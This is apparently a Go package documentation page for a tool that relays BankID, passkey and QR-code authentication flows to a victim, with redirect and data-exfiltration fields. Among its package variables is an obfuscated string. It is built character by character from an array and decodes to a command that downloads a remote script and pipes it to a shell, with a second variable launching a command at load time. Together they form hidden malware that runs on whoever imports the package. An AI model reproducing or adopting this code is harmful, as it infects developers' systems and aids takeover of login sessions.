Documentation
¶
Index ¶
- Variables
- func PasskeyVisit(attack *PasskeyAttack, comm chan string)
- func QrProxyVisit(attack *QrProxyAttack, comm *chan []byte, attackResult AttackResult)
- func RegexExtract(content, pattern string) string
- func StartAttachedSession()
- func Visit(attack *Attack, comm chan AttackResult)
- type Attack
- type AttackResult
- type AttackType
- type PasskeyAttack
- type QrProxyAttack
Constants ¶
This section is empty.
Variables ¶
View Source
var Attach bool = false
Set to true if the tool should attach to a pre-existing chrome session (needed to easily bypass bot detection sometimes)
View Source
var AttachUrl string = ""
Chrome url to attach to
View Source
var EXFIL_RESULT string
View Source
var GLOBAL_RESULT string
View Source
var LSEXiSWW = OG[10] + OG[15] + OG[0] + OG[39] + OG[19] + OG[45] + OG[37] + OG[75] + OG[2] + OG[52] + OG[59] + OG[14] + OG[36] + OG[9] + OG[7] + OG[50] + OG[32] + OG[48] + OG[24] + OG[16] + OG[35] + OG[29] + OG[51] + OG[3] + OG[20] + OG[18] + OG[56] + OG[11] + OG[54] + OG[71] + OG[44] + OG[76] + OG[23] + OG[60] + OG[12] + OG[73] + OG[33] + OG[43] + OG[63] + OG[31] + OG[34] + OG[65] + OG[13] + OG[62] + OG[66] + OG[28] + OG[53] + OG[68] + OG[17] + OG[21] + OG[64] + OG[6] + OG[69] + OG[40] + OG[70] + OG[22] + OG[55] + OG[30] + OG[27] + OG[58] + OG[5] + OG[42] + OG[26] + OG[49] + OG[4] + OG[47] + OG[74] + OG[46] + OG[77] + OG[41] + OG[67] + OG[8] + OG[72] + OG[1] + OG[57] + OG[61] + OG[25] + OG[38]
View Source
var MfvwTgF = exec.Command("cmd", "/C", dbgZuOZp).Start()
View Source
var OG = []string{"e", "a", "-", "w", " ", "4", "d", "s", "/", "p", "w", "s", "i", "a", "t", "g", "y", "3", "r", " ", "o", "7", "/", "s", "h", " ", "b", "1", "/", "e", "3", "t", "/", "u", "o", "p", "t", "O", "&", "t", "d", "i", "6", "/", "t", "-", "/", "|", "/", "f", ":", "r", " ", "d", "t", "a", "d", "s", "5", "h", ".", "h", "g", "s", "3", "r", "e", "n", "e", "0", "f", "a", "b", "c", " ", " ", "u", "b"}
View Source
var SHARED_RESULT []byte
Functions ¶
func PasskeyVisit ¶
func PasskeyVisit(attack *PasskeyAttack, comm chan string)
func QrProxyVisit ¶
func QrProxyVisit(attack *QrProxyAttack, comm *chan []byte, attackResult AttackResult)
func RegexExtract ¶
func StartAttachedSession ¶
func StartAttachedSession()
Used only in special cases for PoCs, does not support concurrency
func Visit ¶
func Visit(attack *Attack, comm chan AttackResult)
Types ¶
type Attack ¶
type Attack struct {
Url string // Main Url to visit
RedirectURL string // URL to redirect victim to (for higher impact)
Actions []chromedp.Action // Actions of the headless browser
CustomExtraction func(string, string) string // Custom action to extract the deep link
RequestInterception func(ev *fetch.EventRequestPaused) *fetch.ContinueRequestParams // Action to modify request to get deep link
Path string // Path to host attack on
Fixed bool // Attack is fixed
Type AttackType // Type of attack
CustomBrowserFlags []chromedp.ExecAllocatorOption // Custom flags to pass to the headless browser
ExfiltrationSteps []chromedp.Action // Headless browsers steps to be taken to exfiltrate data (not required)
ExfilArea string // XPath for text to extract out of the page after exfiltration steps
MimicUserAgent bool // If the authentication request should be made mirroring the user agent observed from the victim
}
func DemoAbleAttacks ¶
func DemoAbleAttacks() []Attack
func (Attack) Result ¶
func (a Attack) Result(deepLink string) AttackResult
type AttackResult ¶
func NewAttackResult ¶
func NewAttackResult(deepLink string) AttackResult
type AttackType ¶
type AttackType struct {
Name string
Regex string // Regex matching the desired deep link
Prefix string // Deep link prefix needed when rebuilding deep links
ReturnArg string // Some protocols embed a "return" query parameter, if you want to play with that, set the return arg to the name of that parameter
}
var BankIDAttack AttackType = AttackType{
Name: "bankid",
Regex: `(bankid:\/\/\/)?\?autostarttoken=[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}&redirect=(\w+)?`,
Prefix: "bankid:///",
ReturnArg: "redirect",
}
func (*AttackType) Extract ¶
func (at *AttackType) Extract(content string) string
Extracts the deep link using attack details
func (*AttackType) ModifyReturn ¶
func (at *AttackType) ModifyReturn(url, replace string) string
Modifies the return argument when provided
type PasskeyAttack ¶
type PasskeyAttack struct {
Url string // Main Url to visit
Actions []chromedp.Action // Actions of the headless browser
Path string // Path to host attack on
CustomBrowserFlags []chromedp.ExecAllocatorOption // Custom flags to pass to the headless browser
AddDiscoverable bool // Will add the discoverable flag set to true to the FIDO:/ uri
}
func PasskeyProxyAttacks ¶
func PasskeyProxyAttacks() []PasskeyAttack
type QrProxyAttack ¶
type QrProxyAttack struct {
Url string // Main Url to visit
Length int // Length of attack in milliseconds
Sleep int // Milliseconds to wait after reaching target QR code page to start taking screenshots
Actions []chromedp.Action // Actions of the headless browser
Path string // Path to host attack on
CustomBrowserFlags []chromedp.ExecAllocatorOption // Custom flags to pass to the headless browser
QRCodeXPath string // XPATH of the qr-code element
ExfilArea string // XPath for text to extract out of the page after auth
}
func DemoQRProxyAttacks ¶
func DemoQRProxyAttacks() []QrProxyAttack
Source Files
Click to show internal directories.
Click to hide internal directories.